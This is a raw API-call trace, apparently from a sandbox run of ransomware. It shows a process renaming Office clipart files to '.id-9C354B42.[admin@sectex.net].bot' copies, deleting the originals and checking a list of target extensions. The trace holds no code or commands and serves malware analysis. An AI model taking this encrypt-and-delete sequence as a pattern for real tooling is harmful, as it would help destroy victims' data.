	[0151.951] WriteFile (in: hFile=0x3d4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.952] SetEndOfFile (hFile=0x3d4) returned 1
	[0151.952] CloseHandle (hObject=0x3d4) returned 1
	[0151.952] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.952] SetEndOfFile (hFile=0x3e0) returned 1
	[0151.954] CloseHandle (hObject=0x3e0) returned 1
	[0151.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.448] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf")) returned 1
	[0152.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.449] lstrlenW (lpString=".doc") returned 4
	[0152.449] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.449] lstrlenW (lpString=".docx") returned 5
	[0152.449] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0152.449] lstrlenW (lpString=".pdf") returned 4
	[0152.449] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.449] lstrlenW (lpString=".xls") returned 4
	[0152.449] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.449] lstrlenW (lpString=".xlsx") returned 5
	[0152.449] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0152.449] lstrlenW (lpString=".ppt") returned 4
	[0152.449] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.449] lstrlenW (lpString=".zip") returned 4
	[0152.449] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.449] lstrlenW (lpString=".rar") returned 4
	[0152.449] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.450] lstrlenW (lpString=".bz2") returned 4
	[0152.450] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.450] lstrlenW (lpString=".7z") returned 3
	[0152.450] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.450] lstrlenW (lpString=".dbf") returned 4
	[0152.450] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.450] lstrlenW (lpString=".1cd") returned 4
	[0152.450] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.450] lstrlenW (lpString=".jpg") returned 4
	[0152.450] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.450] lstrlenW (lpString=".doc") returned 4
	[0152.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.450] lstrlenW (lpString=".docx") returned 5
	[0152.450] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0152.451] lstrlenW (lpString=".pdf") returned 4
	[0152.451] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.451] lstrlenW (lpString=".xls") returned 4
	[0152.451] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.451] lstrlenW (lpString=".xlsx") returned 5
	[0152.451] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0152.451] lstrlenW (lpString=".ppt") returned 4
	[0152.451] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.451] lstrlenW (lpString=".zip") returned 4
	[0152.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.451] lstrlenW (lpString=".rar") returned 4
	[0152.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.451] lstrlenW (lpString=".bz2") returned 4
	[0152.451] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.451] lstrlenW (lpString=".7z") returned 3
	[0152.451] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.451] lstrlenW (lpString=".dbf") returned 4
	[0152.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.451] lstrlenW (lpString=".1cd") returned 4
	[0152.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63
	[0152.451] lstrlenW (lpString=".jpg") returned 4
	[0152.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.451] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.452] lstrlenW (lpString="J0099163.WMF") returned 12
	[0152.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0152.453] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=22356) returned 1
	[0152.453] CloseHandle (hObject=0x388) returned 1
	[0152.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf")) returned 0x20
	[0152.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0152.453] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.453] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.454] GetLastError () returned 0x0
	[0152.454] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5754, lpOverlapped=0x0) returned 1
	[0152.479] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5760, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5760, lpOverlapped=0x0) returned 1
	[0152.480] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.480] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.481] SetEndOfFile (hFile=0x3f0) returned 1
	[0152.481] CloseHandle (hObject=0x3f0) returned 1
	[0152.481] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.481] SetEndOfFile (hFile=0x388) returned 1
	[0152.483] CloseHandle (hObject=0x388) returned 1
	[0152.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf")) returned 1
	[0152.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.579] lstrlenW (lpString=".doc") returned 4
	[0152.579] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.579] lstrlenW (lpString=".docx") returned 5
	[0152.579] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0152.579] lstrlenW (lpString=".pdf") returned 4
	[0152.579] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.579] lstrlenW (lpString=".xls") returned 4
	[0152.579] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.579] lstrlenW (lpString=".xlsx") returned 5
	[0152.579] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0152.579] lstrlenW (lpString=".ppt") returned 4
	[0152.579] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.579] lstrlenW (lpString=".zip") returned 4
	[0152.579] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.579] lstrlenW (lpString=".rar") returned 4
	[0152.579] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.579] lstrlenW (lpString=".bz2") returned 4
	[0152.579] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.579] lstrlenW (lpString=".7z") returned 3
	[0152.579] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.579] lstrlenW (lpString=".dbf") returned 4
	[0152.579] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.580] lstrlenW (lpString=".1cd") returned 4
	[0152.580] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.580] lstrlenW (lpString=".jpg") returned 4
	[0152.580] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.580] lstrlenW (lpString=".doc") returned 4
	[0152.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString=".docx") returned 5
	[0152.580] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0152.580] lstrlenW (lpString=".pdf") returned 4
	[0152.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString=".xls") returned 4
	[0152.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.580] lstrlenW (lpString=".xlsx") returned 5
	[0152.580] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0152.580] lstrlenW (lpString=".ppt") returned 4
	[0152.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.580] lstrlenW (lpString=".zip") returned 4
	[0152.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.580] lstrlenW (lpString=".rar") returned 4
	[0152.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString=".bz2") returned 4
	[0152.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.580] lstrlenW (lpString=".7z") returned 3
	[0152.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.580] lstrlenW (lpString=".dbf") returned 4
	[0152.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.581] lstrlenW (lpString=".1cd") returned 4
	[0152.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63
	[0152.581] lstrlenW (lpString=".jpg") returned 4
	[0152.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.581] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.581] lstrlenW (lpString="J0099172.WMF") returned 12
	[0152.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.616] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=58258) returned 1
	[0152.616] CloseHandle (hObject=0x3b0) returned 1
	[0152.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf")) returned 0x20
	[0152.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.641] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.641] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0152.641] GetLastError () returned 0x0
	[0152.641] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xe392, lpOverlapped=0x0) returned 1
	[0152.644] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xe3a0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xe3a0, lpOverlapped=0x0) returned 1
	[0152.645] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.646] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.646] SetEndOfFile (hFile=0x38c) returned 1
	[0152.646] CloseHandle (hObject=0x38c) returned 1
	[0152.646] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.646] SetEndOfFile (hFile=0x3f0) returned 1
	[0152.649] CloseHandle (hObject=0x3f0) returned 1
	[0152.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.649] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf")) returned 1
	[0152.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.650] lstrlenW (lpString=".doc") returned 4
	[0152.650] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString=".docx") returned 5
	[0152.650] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0152.650] lstrlenW (lpString=".pdf") returned 4
	[0152.650] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString=".xls") returned 4
	[0152.650] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.650] lstrlenW (lpString=".xlsx") returned 5
	[0152.650] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0152.650] lstrlenW (lpString=".ppt") returned 4
	[0152.650] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.650] lstrlenW (lpString=".zip") returned 4
	[0152.650] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.650] lstrlenW (lpString=".rar") returned 4
	[0152.650] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString=".bz2") returned 4
	[0152.650] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString=".7z") returned 3
	[0152.650] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.650] lstrlenW (lpString=".dbf") returned 4
	[0152.650] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.650] lstrlenW (lpString=".1cd") returned 4
	[0152.650] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.650] lstrlenW (lpString=".jpg") returned 4
	[0152.650] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.651] lstrlenW (lpString=".doc") returned 4
	[0152.651] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString=".docx") returned 5
	[0152.651] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0152.651] lstrlenW (lpString=".pdf") returned 4
	[0152.651] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString=".xls") returned 4
	[0152.651] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.651] lstrlenW (lpString=".xlsx") returned 5
	[0152.651] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0152.651] lstrlenW (lpString=".ppt") returned 4
	[0152.651] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.651] lstrlenW (lpString=".zip") returned 4
	[0152.651] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.651] lstrlenW (lpString=".rar") returned 4
	[0152.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString=".bz2") returned 4
	[0152.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString=".7z") returned 3
	[0152.651] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.651] lstrlenW (lpString=".dbf") returned 4
	[0152.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.651] lstrlenW (lpString=".1cd") returned 4
	[0152.651] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 63
	[0152.651] lstrlenW (lpString=".jpg") returned 4
	[0152.652] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.652] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.652] lstrlenW (lpString="J0099176.WMF") returned 12
	[0152.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.652] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2488) returned 1
	[0152.652] CloseHandle (hObject=0x3f0) returned 1
	[0152.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf")) returned 0x20
	[0152.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.653] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.653] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0152.654] GetLastError () returned 0x0
	[0152.654] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9b8, lpOverlapped=0x0) returned 1
	[0152.655] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9c0, lpOverlapped=0x0) returned 1
	[0152.656] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.656] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.656] SetEndOfFile (hFile=0x38c) returned 1
	[0152.657] CloseHandle (hObject=0x38c) returned 1
